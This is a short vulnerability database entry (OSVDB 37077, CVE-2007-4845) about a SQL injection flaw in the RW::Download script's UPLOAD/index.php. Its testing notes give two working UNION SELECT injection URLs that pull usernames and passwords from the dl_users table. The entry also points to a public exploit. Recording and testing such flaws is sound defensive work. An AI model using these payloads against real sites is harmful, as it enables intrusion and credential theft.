RW::Download UPLOAD/index.php Multiple Variable SQL Injection

2007-09-07T00:00:00
ID OSVDB:37077
Type osvdb
Reporter OSVDB
Modified 2007-09-07T00:00:00

Description

Manual Testing Notes

http://[target]/UPLOAD/index.php?url=&dlid=-9%20UNION%20SELECT%20null,null,null,null,username,null,null,null,null,null,null,null,null,password,null,null,null,null%20from%20dl_users/
http://[target]/UPLOAD/index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users/

References:

Generic Exploit URL: http://www.milw0rm.com/exploits/4371
CVE-2007-4845